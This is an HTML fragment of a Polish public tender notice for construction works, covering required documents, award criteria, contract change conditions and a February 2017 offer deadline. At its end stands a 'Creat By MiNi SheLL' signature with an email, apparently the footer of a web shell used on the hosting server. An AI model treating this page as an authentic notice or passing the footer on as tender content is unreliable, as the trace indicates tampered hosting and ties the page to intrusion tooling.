                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px"></div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px">Dla  uzyskania  formalnej poprawności złożonej wykonawca  zobowiązany   jest  do przedłożenia :formularza oferty- załącznik nr 1 do niniejszej specyfikacji,
       b. kosztorysów ofertowych  sporządzonych  metodą  uproszczoną , z  dokładnym wyszczególnieniem  ceny  jednostkowej robót  zawierającej  wszystkie  koszty oprócz  podatku VAT. 
Na stronie tytułowej  określenie   rbg, nakładów, ceny  netto, podatku VAT, ceny  brutto  robot oraz dokumenty, o których mowa  w pkt. 4.1. w przypadku składania oferty  równoważnej tj.  karty katalogowe, deklaracje  zgodności oraz  aprobaty i atesty.
 </div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena oferty</td><td>90</td></tr><tr><td>okres gwaran</td><td>10</td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                tak
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px"></div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px"></div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                tak

                <br />
                Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian:
                <br />Zamawiający zgodnie z art. 144 ust. 1 ustawy przewiduje możliwość istotnych zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie, której dokonano 
wyboru Wykonawcy, w przypadku wystąpienia, co najmniej jednej z okoliczności wymienionych poniżej, z uwzględnieniem podawanych warunków ich wprowadzenia: 
1) zmiana terminu realizacji przedmiotu umowy spowodowane: 
a) warunkami atmosferycznymi, geologicznymi, archeologicznymi, w szczególności: 
- klęski żywiołowe; 
- warunki atmosferyczne uniemożliwiające prowadzenie robót budowlanych na zewnątrz, przeprowadzanie prób i sprawdzeń, dokonywanie odbiorów, w szczególności: temperatury powietrza poniżej 0 o C, wiatr uniemożliwiający pracę maszyn budowlanych, 
- gwałtowne opady deszczu (oberwanie chmury), śniegu, gradobicie, burze z wyładowaniami atmosferycznymi, 
-warunki atmosferyczne uniemożliwiające prowadzenie robót budowlanych, przeprowadzanie prób i sprawdzeń zgodnie z technologią przewidzianą przez producentów, 
- niewypały i niewybuchy, 
- wykopaliska archeologiczne, 
- odmienne od przyjętych w dokumentacji projektowej warunki geologiczne (kategorie gruntu, kurzawka, głazy narzutowe , warunki gruntowe itp.), 
- odmienne od przyjętych w dokumentacji projektowej warunki terenowe, w szczególności istnienie podziemnych sieci, instalacji, urządzeń lub niezinwentaryzowanych obiektów budowlanych (bunkry, fundamenty itp.), 
- wykonanie robót dodatkowych lub uzupełniających wpływających na termin wykonania zamówienia podstawowego. 
b) zmiany będące następstwem okoliczności leżących po stronie Zamawiającego, 
w szczególności: 
- nieterminowe przekazanie terenu budowy przez Zamawiającego; 
- konieczność usunięcia błędów lub wprowadzenia zmian w dokumentacji projektowej; 
c) zmiany będące następstwem działania organów administracji, w szczególności: 
- przekroczenie zakreślonych przez prawo terminów wydawania przez organy administracji decyzji, zezwoleń, uzgodnień itp.; 
- odmowa wydania przez organy administracji wymaganych decyzji, zezwoleń, uzgodnień na skutek błędów w dokumentacji projektowej 
d) inne przyczyny zewnętrzne niezależne od Zamawiającego oraz Wykonawcy skutkujące niemożliwością prowadzenia prac, w szczególności: 
- brak możliwości dojazdu oraz transportu materiałów na teren budowy spowodowany awariami, remontami lub przebudowami dróg dojazdowych, 
 2) zmiany technologiczne, w szczególności: 
a) konieczność zrealizowania przedmiotu umowy przy zastosowaniu innych rozwiązań technicznych/ technologicznych niż wskazane w dokumentacji projektowej w sytuacji, gdyby zastosowanie przewidzianych rozwiązań groziło niewykonaniem lub wadliwym wykonaniem projektu, 
b) odmienne od przyjętych w dokumentacji projektowej warunki geologiczne (kategorie gruntu, kurzawka itp.), skutkujące niemożliwością zrealizowania przedmiotu umowy przy dotychczasowych założeniach technologicznych, odmienne od przyjętych w dokumentacji projektowej warunki terenowe, w szczególności istnienie podziemnych urządzeń, instalacji lub obiektów infrastrukturalnych, 
c) konieczność zrealizowania projektu przy zastosowaniu innych rozwiązań technicznych lub materiałowych ze względu na zmiany obowiązującego prawa, 
3) Zmiany osób, przy pomocy których Wykonawca realizuje przedmiot umowy, na inne legitymujące się co najmniej równoważnymi uprawnieniami, kwalifikacjami i doświadczeniem, o których mowa w ustawie Prawo Budowlane lub innych ustawach, a także w SIWZ. 
3. W przypadku wystąpienia którejkolwiek z okoliczności wymienionych termin wykonania umowy może ulec odpowiedniemu przedłużeniu, o czas niezbędny do zakończenia wykonywania jej przedmiotu w sposób należyty, nie dłużej jednak niż o okres trwania tych okoliczności.  
<br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br /><br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 27/02/2017, godzina: 09:00,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              <br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                nie
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br /></div></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com